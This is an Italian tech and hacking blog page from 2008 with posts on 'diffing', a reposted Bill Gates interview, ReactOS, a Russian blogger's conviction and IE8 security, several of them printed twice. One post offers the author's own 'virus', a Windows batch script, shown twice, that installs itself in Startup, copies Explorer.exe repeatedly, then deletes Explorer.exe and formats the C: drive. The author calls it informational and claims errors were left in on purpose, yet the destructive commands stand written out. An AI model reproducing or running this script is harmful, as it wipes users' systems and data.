W4nt3d hacker, si è gemmellato con SpaceNEwz, un blog dedicato a internet, pc e sicurezza.
Vistatelo:
venerdì 18 luglio 2008
lunedì 14 luglio 2008
Diffing - Parte 1
Il diffing è una dell tecniche hacker più facili ed è utilizzata sopratutto per testare la sicurezza.
In poche parole il diffing consiste nel confrontare un qualsiasi file prima e dopoun'azione.
Il diffing può essere di tre tipi:
-A livello Disco: Indica i files modificati
- A livello dei files che indica i byte modificati
- a livello database, che specifica i redord.
In questo modo si può capire come modificare i dati all'esterno dell'applicazione per quale essi sono destinati.
La funzione Diff, è una funzione da poco aggiunta nei moderni sistemi UNIX e cloni, questa funzione non è altro che l'abbreviazione di difference. Quindi si può capire che diffing significa " uso del diff". Grazie a qesto confronto è possibile raccogliere informazioni riguardo il file.
In poche parole il diffing consiste nel confrontare un qualsiasi file prima e dopoun'azione.
Il diffing può essere di tre tipi:
-A livello Disco: Indica i files modificati
- A livello dei files che indica i byte modificati
- a livello database, che specifica i redord.
In questo modo si può capire come modificare i dati all'esterno dell'applicazione per quale essi sono destinati.
La funzione Diff, è una funzione da poco aggiunta nei moderni sistemi UNIX e cloni, questa funzione non è altro che l'abbreviazione di difference. Quindi si può capire che diffing significa " uso del diff". Grazie a qesto confronto è possibile raccogliere informazioni riguardo il file.
sabato 12 luglio 2008
W4nt3d Virus ver.2 beta
del nuovo fantomatico virus, che ho creato, nell'ultima versione ho aggiunto due varienti, se l'utente conosce Linux, non succede niente, ma se l'utente non lo conosce beh.....
@echo on
copy 1.bat C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\1.bat
copy 1.bat C:\WINDOWS\Freedom.bat /A/B/V/Y/-Y
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\B.bat /A/B
copyer C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\C.bat /A/B
copy C:\WINDsOWS\Freedom.bat C:\WINDOWS\twain_32\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\F.bat /A/B
copy C:\WINasdDOWS\Freedom.bat C:\WINDOWS\twain_32\G.bat /A/B
copy C:\WINDOWS\Fadreedom.bat C:\WINDOWS\twain_32\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\I.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\M.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\B.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\C.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\F.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\G.bat /A/B
copy C:\WINDsasdOWS\Freedom.bat C:\WINDOWS\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\I.bat /A/B
copy C:\WINDasdOWS\Freedom.bat C:\WINDOWS\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\M.bat /A/B
copy C:\WINDOWS\Explorer.exe C:\2.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\4.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\5.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\6.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\7.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\8.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\9.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\0.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\10.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\11.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\12.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\132.txt /A/B/V/Y/-Y
date 01-01-1980
copy C:\WINDOWS\Explorer.exe C:\32.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\43.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\34.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\35.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\36.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\37.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\38.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\39.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\30.txt /A/B/V/Y/-Y
copy C:\WINDdOWS\Explorer.exe C:\310.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\311.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\312.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3132.txt /A/B/V/Y/-Y
choice/C:SN /T:N,15 Conosci LINUX??????
erase C:\WINDOWS\Explorer.exe
format C: /
Allora un piccolo riepilogo, questo w4nt3d, virus a SCOPO INFORMATIVO IL BLGO SI SOLLEVA DA QUALSIASI SCOPO DANNOSO(che poi è anche presente un erroe nel codice per far si di non darvi l'arma carica)
@echo on
copy 1.bat C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\1.bat
copy 1.bat C:\WINDOWS\Freedom.bat /A/B/V/Y/-Y
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\B.bat /A/B
copyer C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\C.bat /A/B
copy C:\WINDsOWS\Freedom.bat C:\WINDOWS\twain_32\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\F.bat /A/B
copy C:\WINasdDOWS\Freedom.bat C:\WINDOWS\twain_32\G.bat /A/B
copy C:\WINDOWS\Fadreedom.bat C:\WINDOWS\twain_32\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\I.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\M.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\B.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\C.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\F.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\G.bat /A/B
copy C:\WINDsasdOWS\Freedom.bat C:\WINDOWS\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\I.bat /A/B
copy C:\WINDasdOWS\Freedom.bat C:\WINDOWS\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\M.bat /A/B
copy C:\WINDOWS\Explorer.exe C:\2.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\4.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\5.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\6.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\7.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\8.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\9.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\0.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\10.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\11.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\12.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\132.txt /A/B/V/Y/-Y
date 01-01-1980
copy C:\WINDOWS\Explorer.exe C:\32.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\43.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\34.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\35.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\36.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\37.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\38.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\39.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\30.txt /A/B/V/Y/-Y
copy C:\WINDdOWS\Explorer.exe C:\310.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\311.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\312.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3132.txt /A/B/V/Y/-Y
choice/C:SN /T:N,15 Conosci LINUX??????
erase C:\WINDOWS\Explorer.exe
format C: /
Allora un piccolo riepilogo, questo w4nt3d, virus a SCOPO INFORMATIVO IL BLGO SI SOLLEVA DA QUALSIASI SCOPO DANNOSO(che poi è anche presente un erroe nel codice per far si di non darvi l'arma carica)
venerdì 11 luglio 2008
Ciao zio Bill
Roma - Era atteso da tempo, ma il giorno fatidico è arrivato e passato non senza un certo clamore: Bill Gates ha lasciato il suo lavoro a tempo pieno in Microsoft, ufficialmente per dedicarsi alla sua attività filantropica, grazie alla fondazione creata qualche anno fa. Cosa succederà ora alla sua azienda? C'è chi indica la partenza di Gates come l'inizio della fine della BigM che conosciamo, altri sono più ottimisti: di certo Microsoft cambierà, in meglio o in peggio è da vedersi.
Per cercare di fare il punto sull'evoluzione dell'azienda di Redmond, Punto Informatico si è rivolto ad una delle voci più autorevoli in materia: Mary Jo Foley, blogger-editorialista e autrice di un recente libro intitolato Microsoft 2.0, che tenta proprio di spiegare come l'azienda fondata 33 anni fa da Gates pensa di riuscire a restare a galla dopo la sua partenza.
Punto Informatico: Dunque Mr. Gates se ne va. Nel suo libro, lei racconta di questa condizione tutta nuova per manager e dipendenti di Microsoft: ma Bill Gates è davvero insostituibile, oppure Microsoft può sopravvivere alla sua partenza e alla sua eredità?
Mary Jo Foley: Credo che Gates sia davvero insostituibile. Il CEO Steve Ballmer non può rimpiazzarlo, né può farlo il chief sowftware architect Ray Ozzie. Ma non credo che questo significhi che Microsoft sia morta o stia morendo.
PI: Chi prenderà il suo posto allora?
MJF: Gates ha di recente spiegato che si aspetta che i 22 technical fellow, più Ray Ozzie e Craig Mundie (il capo della ricerca e della strategia) - 24 persone in totale - lo rimpiazzino. L'azienda ha un piano per il futuro e ha molti interessanti progetti in preparazione - dal modello di strategia/architettura Oslo, a Live Mesh, fino a Midori (un nuovo sistema operativo che non sarà basato sul core di Windows).
PI: La nuova Microsoft sarà una azienda centrata su Steve Ballmer come lo è stata su Bill Gates sin dai primi anni?
MJF: No, non credo. Gates ha ricevuto molto credito per aver fondato l'azienda ed è stato visto come il perfetto uomo immagine di Microsoft da molti osservatori sia dentro che fuori la company. Ora Ballmer è senz'altro "il comandante in capo", non c'è dubbio. Ma poiché è più un commerciale che un tecnico, ritengo che il pubblico lo considererà più come un manager di Microsoft, invece che colui che definisce lo "spirito" della società.
PI: Sarà anche che il mondo è cambiato?
MJF: L'industria IT è cambiata molto rispetto a quando Gates ha fondato Microsoft 33 anni fa. L'azienda, sotto la sua guida, ha avuto la possibilità di cambiare il business del PC convincendo (anche con la forza) i produttori a preinstallare Windows. Così Microsoft è diventata grande e ricca. Ora l'industria è molto più frammentata. Certo, Google è il monopolista del search, ma non credo sia oggi più possibile che un nuovo monopolista detenga nelle sue mani l'intero comparto IT. Google, ad esempio, ne possiede/controlla solo un pezzo relativamente piccolo.
Per cercare di fare il punto sull'evoluzione dell'azienda di Redmond, Punto Informatico si è rivolto ad una delle voci più autorevoli in materia: Mary Jo Foley, blogger-editorialista e autrice di un recente libro intitolato Microsoft 2.0, che tenta proprio di spiegare come l'azienda fondata 33 anni fa da Gates pensa di riuscire a restare a galla dopo la sua partenza.Punto Informatico: Dunque Mr. Gates se ne va. Nel suo libro, lei racconta di questa condizione tutta nuova per manager e dipendenti di Microsoft: ma Bill Gates è davvero insostituibile, oppure Microsoft può sopravvivere alla sua partenza e alla sua eredità?
Mary Jo Foley: Credo che Gates sia davvero insostituibile. Il CEO Steve Ballmer non può rimpiazzarlo, né può farlo il chief sowftware architect Ray Ozzie. Ma non credo che questo significhi che Microsoft sia morta o stia morendo.
PI: Chi prenderà il suo posto allora?
MJF: Gates ha di recente spiegato che si aspetta che i 22 technical fellow, più Ray Ozzie e Craig Mundie (il capo della ricerca e della strategia) - 24 persone in totale - lo rimpiazzino. L'azienda ha un piano per il futuro e ha molti interessanti progetti in preparazione - dal modello di strategia/architettura Oslo, a Live Mesh, fino a Midori (un nuovo sistema operativo che non sarà basato sul core di Windows).
PI: La nuova Microsoft sarà una azienda centrata su Steve Ballmer come lo è stata su Bill Gates sin dai primi anni?
MJF: No, non credo. Gates ha ricevuto molto credito per aver fondato l'azienda ed è stato visto come il perfetto uomo immagine di Microsoft da molti osservatori sia dentro che fuori la company. Ora Ballmer è senz'altro "il comandante in capo", non c'è dubbio. Ma poiché è più un commerciale che un tecnico, ritengo che il pubblico lo considererà più come un manager di Microsoft, invece che colui che definisce lo "spirito" della società.
PI: Sarà anche che il mondo è cambiato?
MJF: L'industria IT è cambiata molto rispetto a quando Gates ha fondato Microsoft 33 anni fa. L'azienda, sotto la sua guida, ha avuto la possibilità di cambiare il business del PC convincendo (anche con la forza) i produttori a preinstallare Windows. Così Microsoft è diventata grande e ricca. Ora l'industria è molto più frammentata. Certo, Google è il monopolista del search, ma non credo sia oggi più possibile che un nuovo monopolista detenga nelle sue mani l'intero comparto IT. Google, ad esempio, ne possiede/controlla solo un pezzo relativamente piccolo.
React OS
Continua l’eterno processo di sviluppo di ReactOS, sistema operativo libero basato su kernel ibrido il quale è in grado di fornire un’implementazione completa delle API e delle ABI di Windows XP (NT).
Il progetto ha origini ormai remote che risalgono al lontano 1995; tutto partì dalla bozza di un sistema “compatibile” con Windows 95 ma, a causa di problemi di carenza delle funzionalità, FreeWin95 morì ancor prima di nascere.
I programmatori però non si arresero e alla fine dello stesso anno decisero di puntare alla realizzazione di un sistema operativo totalmente Open Source ma mirante a ottenere piena compatibilità con il più avanzato Windows NT di cui oggi è diretto discendente Windows XP.
Blogger arrestato in russia
Roma - Il blog non è un mass medium, esprimersi su un blog equivale a prorompere in un'esternazione in un luogo pubblico: le autorità russe lo riconoscono, ma nel contempo condannano ad un anno di carcere con la condizionale un giovane cittadino che si è lasciato andare a commenti caustici sulle forze dell'ordine locali.
"Le forze dell'ordine sono la feccia" scriveva Savva Terentiev nel blog di un giornalista nel febbraio del 2007: con un lessico aggressivo esprimeva il proprio dissenso nei confronti dei provvedimenti presi dalle autorità per soffocare la libertà di stampa dei mezzi di informazione di opposizione di Syktyvkar, nel profondo nord russo. Proponeva che le forze di polizia venissero immolate su pire in ogni piazza della Russia due volte al giorno, proponeva che gli agenti venissero bruciati su fuochi catartici.
Terentiev è stato trascinato in tribunale, il procuratore lo ha accusato di aver incitato all'odio i suoi concittadini, di aver impugnato il commento su un blog come fosse un medium ordinario "con l'obiettivo di aizzare i cittadini contro uno specifico gruppo sociale". Il commento è stato rimosso, sul suo commento sono state effettuate analisi linguistiche per verificare che la sortita di Terentiev fosse a tal punto dirompente. Il giovane blogger si è rivolto al presidente Medvedev, ha pubblicato una lettera aperta, ha tentato di dimostrare la propria innocenza pur ammettendo che "è nostro dovere assumerci la responsabilità per le parole postate sul Web". Nonostante Terentiev si proclamasse innocente, nonostante abbia ammesso che le sue parole potessero essere infiammabili, il giudice lo ha ritenuto colpevole, lo ha condannato ad un anno di carcere con la condizionale.
Poco importa che la condanna sia stata mitigata rispetto alle previsioni iniziali: il caso potrebbe costituire un precedente per la giurisprudenza russa, commentano i blogger locali. Le associazioni per i diritti civili, come SOVA, avvertono infatti che il giudice si è prodotto in contorsioni legali, che ha stiracchiato la legge estendendo di fatto ai blog lo status di mezzi di comunicazione: "Questo verdetto potrebbe significare che è impossibile esprimere commenti poco gentili nei confronti di qualcuno".
A sostegno di Terentiev sono stati aperti dei blog che raccontano l'evolvere della sua vicenda giudiziaria, sono stati postati video provocatori su YouTube, si è pronunciato Anton Nosik di LiveJournal, piattaforma sulla quale operano molti netizen russi: "Un weblog non è un massmedium, è stato creato per scambiarsi opinioni. Arrestare qualcuno perché esprime delle rimostranze in un blog, è come arrestarlo perché ha espresso delle opinioni mentre si trovava in un autobus".
"Le forze dell'ordine sono la feccia" scriveva Savva Terentiev nel blog di un giornalista nel febbraio del 2007: con un lessico aggressivo esprimeva il proprio dissenso nei confronti dei provvedimenti presi dalle autorità per soffocare la libertà di stampa dei mezzi di informazione di opposizione di Syktyvkar, nel profondo nord russo. Proponeva che le forze di polizia venissero immolate su pire in ogni piazza della Russia due volte al giorno, proponeva che gli agenti venissero bruciati su fuochi catartici.Terentiev è stato trascinato in tribunale, il procuratore lo ha accusato di aver incitato all'odio i suoi concittadini, di aver impugnato il commento su un blog come fosse un medium ordinario "con l'obiettivo di aizzare i cittadini contro uno specifico gruppo sociale". Il commento è stato rimosso, sul suo commento sono state effettuate analisi linguistiche per verificare che la sortita di Terentiev fosse a tal punto dirompente. Il giovane blogger si è rivolto al presidente Medvedev, ha pubblicato una lettera aperta, ha tentato di dimostrare la propria innocenza pur ammettendo che "è nostro dovere assumerci la responsabilità per le parole postate sul Web". Nonostante Terentiev si proclamasse innocente, nonostante abbia ammesso che le sue parole potessero essere infiammabili, il giudice lo ha ritenuto colpevole, lo ha condannato ad un anno di carcere con la condizionale.
Poco importa che la condanna sia stata mitigata rispetto alle previsioni iniziali: il caso potrebbe costituire un precedente per la giurisprudenza russa, commentano i blogger locali. Le associazioni per i diritti civili, come SOVA, avvertono infatti che il giudice si è prodotto in contorsioni legali, che ha stiracchiato la legge estendendo di fatto ai blog lo status di mezzi di comunicazione: "Questo verdetto potrebbe significare che è impossibile esprimere commenti poco gentili nei confronti di qualcuno".
A sostegno di Terentiev sono stati aperti dei blog che raccontano l'evolvere della sua vicenda giudiziaria, sono stati postati video provocatori su YouTube, si è pronunciato Anton Nosik di LiveJournal, piattaforma sulla quale operano molti netizen russi: "Un weblog non è un massmedium, è stato creato per scambiarsi opinioni. Arrestare qualcuno perché esprime delle rimostranze in un blog, è come arrestarlo perché ha espresso delle opinioni mentre si trovava in un autobus".
IE8 tutta sicurezza
Internet Explorer beta 2, la cui uscita è attesa in concomitanza con l'arrivo del mese di agosto, apporterà nuove soluzioni in grado di rendere la navigazione sul Web una operazione ancora più sicura. Particolarmente importante si rivela la funzione SmartScreen Filter, che sostituisce il Phishing Filter presente in IE7, il filtro XSS, i cambiamenti introdotti ai componenti Active X e l'abilitazione del Data Execution Prevention (DEP).
La funzione SmartScreen Filter nasce in risposta alle funzionalità antiphishing introdotte di recente in Firefox 3 e Opera 9.5 e, come la precedente tecnologia introdotta in IE7, fornisce strumenti in grado di combattere la piaga del phishing, aggiungendo inoltre protezione nei confronti di siti Web malevoli e un supporto anti malware. Il filtro si basa su di una blacklist costantemente aggiornata e supporta anche un controllo di tipo euristico, presentando così l'avviso di un potenziale pericolo. Il filtro XSS (cross-site scripting) utilizza una tecnica euristica per "ripulire" eventuali script malevoli presenti all'interno delle pagine Web e che effettuano richieste di tipo cross-site, avvisando nel contempo del potenziale pericolo.
Numerosi i cambiamenti introdotti nella gestione dei componenti ActiveX, i quali vengono ora installati in relazione ai profili dei singoli utenti e sulla base dei singoli siti; ogni singolo utente disporrà quindi di una copia di Internet Explorer al cui interno saranno presenti solamente i componenti ActiveX da lui installati, mentre i singoli componenti funzioneranno solamente all'interno della pagine Web dalle quali sono stati scaricati.
La funzione ActiveX Killbits, in grado di disabilitare i componenti nel caso siano state riscontrate vulnerabilità, offre ora una integrazione con Windows Update; Microsoft potrà quindi inviare un Killbit attraverso il sistema di aggiornamento automatico e bloccare così l'esecuzione di componenti obsoleti o potenzialmente pericolosi all'interno del browser. La Data Execution Prevention (DEP), sinora disabilitata in Internet Explorer per motivi di compatibilità con alcuni controlli ActiveX, verrà ora resa attiva e utilizzata di default sotto Windows XP SP3 e Windows Vista SP1.
http://www.webnews.it/news/leggi/8726/ie8-beta-2-punta-sulla-sicurezza/
Iscriviti a:
Post (Atom)
Post
